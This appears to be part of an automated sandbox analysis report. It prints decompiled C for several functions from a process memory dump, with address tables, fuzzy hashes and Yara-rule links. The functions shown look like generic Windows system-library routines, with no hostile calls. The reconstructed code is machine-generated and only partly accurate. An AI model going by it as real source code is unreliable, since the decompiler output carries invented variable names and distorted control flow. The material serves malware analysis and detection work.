                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2ed998a6406f546e09bf310738d69a4e0e2a99ae46e53d2f3371baafe91e9a55
                                                                                            • Instruction ID: 9989e012c5ab6736cc89e931e42af985f125d1fc8da975f347c490800284fe29
                                                                                            • Opcode Fuzzy Hash: 2ed998a6406f546e09bf310738d69a4e0e2a99ae46e53d2f3371baafe91e9a55
                                                                                            • Instruction Fuzzy Hash: E30126B2A01611BBE3378F1AE900E26BBA6EF85B60715406DED498B320D730F801C7C0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CDC962, Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 42%
                                                                                            			E04CDC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x4dcd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E04CEEEF0(0x4dc70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E04D5F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E04CEEB70(_t29, 0x4dc70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E04D1B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E04D5F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x4dc70c0; // 0x0
					while(_t38 != 0x4dc70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x4dcb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                                            0x04cdc96a
                                                                                            0x04cdc974
                                                                                            0x04cdc988
                                                                                            0x04cdc98a
                                                                                            0x04d47c9d
                                                                                            0x04d47c9f
                                                                                            0x04d47ca4
                                                                                            0x04d47cae
                                                                                            0x04d47cf0
                                                                                            0x04d47cf5
                                                                                            0x04d47cfa
                                                                                            0x04cdc992
                                                                                            0x04cdc996
                                                                                            0x04cdc997
                                                                                            0x04cdc998
                                                                                            0x04cdc9a3
                                                                                            0x04cdc9a3
                                                                                            0x04d47cb0
                                                                                            0x04d47cb7
                                                                                            0x04d47cbb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47cbd
                                                                                            0x04d47ce8
                                                                                            0x04d47cc5
                                                                                            0x04d47cc8
                                                                                            0x04d47cca
                                                                                            0x04d47cd0
                                                                                            0x04d47cd6
                                                                                            0x04d47cde
                                                                                            0x04d47ce4
                                                                                            0x04d47ce4
                                                                                            0x04d47cd0
                                                                                            0x00000000
                                                                                            0x04d47ce8
                                                                                            0x04cdc990
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 52c831c86bb6c123b6fd7045efb3d6a5b299ba4a75b712a5329df2aa038d9285
                                                                                            • Instruction ID: 277052866fa8763ba1b7878c13b505352c98298e4bbc8a33b06c61e5e9e77515
                                                                                            • Opcode Fuzzy Hash: 52c831c86bb6c123b6fd7045efb3d6a5b299ba4a75b712a5329df2aa038d9285
                                                                                            • Instruction Fuzzy Hash: 4B11CE317006079BDB10AF69DC95A2A77F6FBC8614B100529E941876A0EF24FC54DBD1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D0002D, Relevance: .1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04D0002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04CF7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04CF7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04CF7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04CF7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                                            0x04d00032
                                                                                            0x04d00037
                                                                                            0x04d00043
                                                                                            0x04d44b3a
                                                                                            0x04d00049
                                                                                            0x04d00049
                                                                                            0x04d00049
                                                                                            0x04d0004e
                                                                                            0x04d00053
                                                                                            0x04d44b48
                                                                                            0x04d44b5a
                                                                                            0x04d44b4a
                                                                                            0x04d44b53
                                                                                            0x04d44b53
                                                                                            0x04d44b5f
                                                                                            0x00000000
                                                                                            0x04d44b61
                                                                                            0x00000000
                                                                                            0x04d44b61
                                                                                            0x04d00059
                                                                                            0x04d00059
                                                                                            0x04d00060
                                                                                            0x04d44b6f
                                                                                            0x04d44b6f
                                                                                            0x04d00069
                                                                                            0x04d44b83
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d44b90
                                                                                            0x04d44b9b
                                                                                            0x04d44b9b
                                                                                            0x04d44ba4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d44baa
                                                                                            0x00000000
                                                                                            0x04d0006f
                                                                                            0x04d0006f
                                                                                            0x00000000
                                                                                            0x04d0006f
                                                                                            0x04d00069

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                            • Instruction ID: b4cf8ed7f9265ab463f3f5f28a0efef69928c0bb1ce636ce9cf45994202279a2
                                                                                            • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                            • Instruction Fuzzy Hash: 7511AD327066819FE7239B28ED54B3577D5BB81758F0900A1DE449B692E729F881D260
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CE766D, Relevance: .1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 94%
                                                                                            			E04CE766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E04D0F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E04D0F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04CF4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                                            0x04ce7672
                                                                                            0x04ce767f
                                                                                            0x04ce7689
                                                                                            0x04ce76de
                                                                                            0x04ce76de
                                                                                            0x04ce768b
                                                                                            0x04ce7691
                                                                                            0x04ce7693
                                                                                            0x04ce7697
                                                                                            0x00000000
                                                                                            0x04ce7699
                                                                                            0x04ce76a8
                                                                                            0x00000000
                                                                                            0x04ce76aa
                                                                                            0x04ce76ad
                                                                                            0x04ce76b1
                                                                                            0x00000000
                                                                                            0x04ce76b3
                                                                                            0x04ce76b3
                                                                                            0x04ce76b5
                                                                                            0x04ce76ba
                                                                                            0x04ce76bc
                                                                                            0x04ce76bc
                                                                                            0x04ce76c0
                                                                                            0x00000000
                                                                                            0x04ce76c2
                                                                                            0x04ce76ce
                                                                                            0x04ce76ce
                                                                                            0x04ce76c0
                                                                                            0x04ce76b1
                                                                                            0x04ce76a8
                                                                                            0x04ce7697
                                                                                            0x04ce76d9

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                            • Instruction ID: b2d26b82db1f469399a3cde05afbb7254403b941583f451af197c91c8f6f9e17
                                                                                            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                            • Instruction Fuzzy Hash: 5D018432701119EFD720BE5FDD46E6B77AEEB84764B284524BA08CB250DB70ED0187A0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D6C450, Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 46%
                                                                                            			E04D6C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04D19910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E04D195B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E04D195D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E04D195D0();
				return L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                                            0x04d6c458
                                                                                            0x04d6c45d
                                                                                            0x04d6c466
                                                                                            0x04d6c468
                                                                                            0x04d6c469
                                                                                            0x04d6c46a
                                                                                            0x04d6c46b
                                                                                            0x04d6c46e
                                                                                            0x04d6c46f
                                                                                            0x04d6c471
                                                                                            0x04d6c476
                                                                                            0x04d6c476
                                                                                            0x04d6c47c
                                                                                            0x04d6c47e
                                                                                            0x04d6c480
                                                                                            0x04d6c480
                                                                                            0x04d6c483
                                                                                            0x04d6c484
                                                                                            0x04d6c486
                                                                                            0x04d6c488
                                                                                            0x04d6c48f
                                                                                            0x04d6c491
                                                                                            0x04d6c493
                                                                                            0x04d6c493
                                                                                            0x04d6c48f
                                                                                            0x04d6c498
                                                                                            0x04d6c49e
                                                                                            0x04d6c4ad
                                                                                            0x04d6c4ad
                                                                                            0x04d6c4b2
                                                                                            0x04d6c4b4
                                                                                            0x04d6c4cd

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                            • Instruction ID: 91e287a9e99ac2e4264eba60a7b9667b166e486ac082d303038fc0124f23d175
                                                                                            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                            • Instruction Fuzzy Hash: 1A019EB2240905BFE721AF65CC94EA2FB6EFF54794F004526F65552570CB22BCA0CAB0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CD9080, Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 69%
                                                                                            			E04CD9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x4dc85ec;
				E04CF2280(_t48, 0x4dc85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E04CEFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x4dc538c; // 0xd1f988
					if( *_t84 != 0x4dc5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x4daf6e8);
						E04D2D0E8(0x4dc85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E04DA88F5(_t80, _t85, 0x4dc5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x4dc86c0; // 0xd007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x4dc86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04CF2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E04DA88F5(0x4dc85ec, _t85, 0x4dc5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E04D1AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x4dcb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x4dc84c0;
																			if(_t82 >=  *0x4dc84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04DA9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E04CD922A(_t99);
										_t64 = E04CF7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04DA8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x4dc86c0; // 0xd007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x4dc86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x4dc86bc;
													_t87 = 0x4dc86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04CD9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x4dc86c4;
												_t87 = 0x4dc86c0;
												L27:
												E04D09B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E04D2D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4dc5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x4dc538c = _t51;
						goto L6;
					}
				}
			}




















                                                                                            0x04cd9082
                                                                                            0x04cd9083
                                                                                            0x04cd9084
                                                                                            0x04cd9085
                                                                                            0x04cd9087
                                                                                            0x04cd9096
                                                                                            0x04cd9098
                                                                                            0x04cd9098
                                                                                            0x04cd909e
                                                                                            0x04cd90a8
                                                                                            0x04cd90e7
                                                                                            0x04cd90e7
                                                                                            0x04cd90aa
                                                                                            0x04cd90b0
                                                                                            0x04cd90b7
                                                                                            0x04cd90bd
                                                                                            0x04cd90dd
                                                                                            0x04cd90e6
                                                                                            0x04cd90bf
                                                                                            0x04cd90bf
                                                                                            0x04cd90c7
                                                                                            0x04cd90cf
                                                                                            0x04cd90f1
                                                                                            0x04cd90f2
                                                                                            0x04cd90f4
                                                                                            0x04cd90f5
                                                                                            0x04cd90f6
                                                                                            0x04cd90f7
                                                                                            0x04cd90f8
                                                                                            0x04cd90f9
                                                                                            0x04cd90fa
                                                                                            0x04cd90fb
                                                                                            0x04cd90fc
                                                                                            0x04cd90fd
                                                                                            0x04cd90fe
                                                                                            0x04cd90ff
                                                                                            0x04cd9100
                                                                                            0x04cd9102
                                                                                            0x04cd9107
                                                                                            0x04cd910c
                                                                                            0x04cd9110
                                                                                            0x04cd9113
                                                                                            0x04cd9115
                                                                                            0x04cd9136
                                                                                            0x04cd913f
                                                                                            0x04cd9143
                                                                                            0x04d337e4
                                                                                            0x04d337e4
                                                                                            0x04cd9117
                                                                                            0x04cd9117
                                                                                            0x04cd911d
                                                                                            0x00000000
                                                                                            0x04cd911f
                                                                                            0x04cd911f
                                                                                            0x04cd9125
                                                                                            0x00000000
                                                                                            0x04cd9127
                                                                                            0x04cd912d
                                                                                            0x04cd9130
                                                                                            0x04cd9134
                                                                                            0x04cd9158
                                                                                            0x04cd915d
                                                                                            0x04cd9161
                                                                                            0x04cd9168
                                                                                            0x04d33715
                                                                                            0x04cd916e
                                                                                            0x04cd916e
                                                                                            0x04cd9175
                                                                                            0x04cd9177
                                                                                            0x04cd917e
                                                                                            0x04cd917f
                                                                                            0x04cd9182
                                                                                            0x04cd9182
                                                                                            0x04cd9187
                                                                                            0x04cd9187
                                                                                            0x04cd918a
                                                                                            0x04cd918d
                                                                                            0x04cd918f
                                                                                            0x04cd9192
                                                                                            0x04cd9195
                                                                                            0x04cd9198
                                                                                            0x04cd9198
                                                                                            0x04cd9198
                                                                                            0x04cd919a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d3371f
                                                                                            0x04d33721
                                                                                            0x04d33727
                                                                                            0x04d3372f
                                                                                            0x04d33733
                                                                                            0x04d33735
                                                                                            0x04d33738
                                                                                            0x04d3373b
                                                                                            0x04d3373d
                                                                                            0x04d33740
                                                                                            0x00000000
                                                                                            0x04d33746
                                                                                            0x04d33746
                                                                                            0x04d33749
                                                                                            0x00000000
                                                                                            0x04d3374f
                                                                                            0x04d3374f
                                                                                            0x04d33751
                                                                                            0x04d33757
                                                                                            0x04d33759
                                                                                            0x04d3375c
                                                                                            0x04d3375c
                                                                                            0x04d3375e
                                                                                            0x04d3375e
                                                                                            0x04d33761
                                                                                            0x04d33764
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d33766
                                                                                            0x04d33768
                                                                                            0x04d337a3
                                                                                            0x04d337a3
                                                                                            0x04d337a5
                                                                                            0x04d337a7
                                                                                            0x04d337ad
                                                                                            0x04d337b0
                                                                                            0x04d337b2
                                                                                            0x04d337bc
                                                                                            0x04d337c2
                                                                                            0x04d337c2
                                                                                            0x04d337b2
                                                                                            0x04cd9187
                                                                                            0x04cd9187
                                                                                            0x04cd918a
                                                                                            0x04cd918d
                                                                                            0x04cd918f
                                                                                            0x04cd9192
                                                                                            0x04cd9195
                                                                                            0x00000000
                                                                                            0x04cd9195
                                                                                            0x00000000
                                                                                            0x04d3376a
                                                                                            0x04d3376a
                                                                                            0x04d3376a
                                                                                            0x04d3376c
                                                                                            0x04d3376c
                                                                                            0x04d3376f
                                                                                            0x04d33775
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d33777
                                                                                            0x04d33779
                                                                                            0x04d33782
                                                                                            0x04d33787
                                                                                            0x04d33789
                                                                                            0x04d33790
                                                                                            0x04d33790
                                                                                            0x04d3378b
                                                                                            0x04d3378b
                                                                                            0x04d3378b
                                                                                            0x04d33792
                                                                                            0x04d33795
                                                                                            0x00000000
                                                                                            0x04d33795
                                                                                            0x00000000
                                                                                            0x04d33779
                                                                                            0x04d33798
                                                                                            0x00000000
                                                                                            0x04d33798
                                                                                            0x00000000
                                                                                            0x04d33768
                                                                                            0x04d3379b
                                                                                            0x04d3379b
                                                                                            0x04d33751
                                                                                            0x04d33749
                                                                                            0x00000000
                                                                                            0x04d33740
                                                                                            0x04cd91a0
                                                                                            0x04cd91a3
                                                                                            0x04cd91a9
                                                                                            0x04cd91b0
                                                                                            0x00000000
                                                                                            0x04cd91b0
                                                                                            0x04cd9187
                                                                                            0x04cd91b4
                                                                                            0x04cd91b4
                                                                                            0x04cd91bb
                                                                                            0x04cd91c0
                                                                                            0x04cd91c5
                                                                                            0x04cd91c7
                                                                                            0x04d337da
                                                                                            0x04cd91cd
                                                                                            0x04cd91cd
                                                                                            0x04cd91cd
                                                                                            0x04cd91d2
                                                                                            0x04cd91d5
                                                                                            0x04cd9239
                                                                                            0x04cd9239
                                                                                            0x04cd91d7
                                                                                            0x04cd91db
                                                                                            0x04cd91e1
                                                                                            0x04cd91e7
                                                                                            0x04cd91fd
                                                                                            0x04cd9203
                                                                                            0x04cd921e
                                                                                            0x04cd9223
                                                                                            0x00000000
                                                                                            0x04cd9205
                                                                                            0x04cd9205
                                                                                            0x04cd9208
                                                                                            0x04cd920c
                                                                                            0x04cd9214
                                                                                            0x04cd9214
                                                                                            0x04cd920c
                                                                                            0x04cd91e9
                                                                                            0x04cd91e9
                                                                                            0x04cd91ee
                                                                                            0x04cd91f3
                                                                                            0x04cd91f3
                                                                                            0x04cd91f3
                                                                                            0x04cd91e7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cd9134
                                                                                            0x04cd9125
                                                                                            0x04cd911d
                                                                                            0x04cd914e
                                                                                            0x04cd90d1
                                                                                            0x04cd90d1
                                                                                            0x04cd90d3
                                                                                            0x04cd90d6
                                                                                            0x04cd90d8
                                                                                            0x00000000
                                                                                            0x04cd90d8
                                                                                            0x04cd90cf

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 216a03e62499d847236784e80dbe1e94f6bc712fcdf7f2b2cb00fb6cb35fe0a7
                                                                                            • Instruction ID: 71706acb57d5103c99b779e1655032b4881d6297779498bfd3ebe444267f8bd8
                                                                                            • Opcode Fuzzy Hash: 216a03e62499d847236784e80dbe1e94f6bc712fcdf7f2b2cb00fb6cb35fe0a7
                                                                                            • Instruction Fuzzy Hash: 610128B26012119FE7249F04E840B21B7FAEF89324F25416BE6019B791C374FD41CBD0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04DA4015, Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 86%
                                                                                            			E04DA4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04CF2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04CF2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4dc86ac);
					E04CDF900(0x4dc86d4, _t28);
					E04CEFFB0(0x4dc86ac, _t28, 0x4dc86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E04CEFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                                            0x04da401a
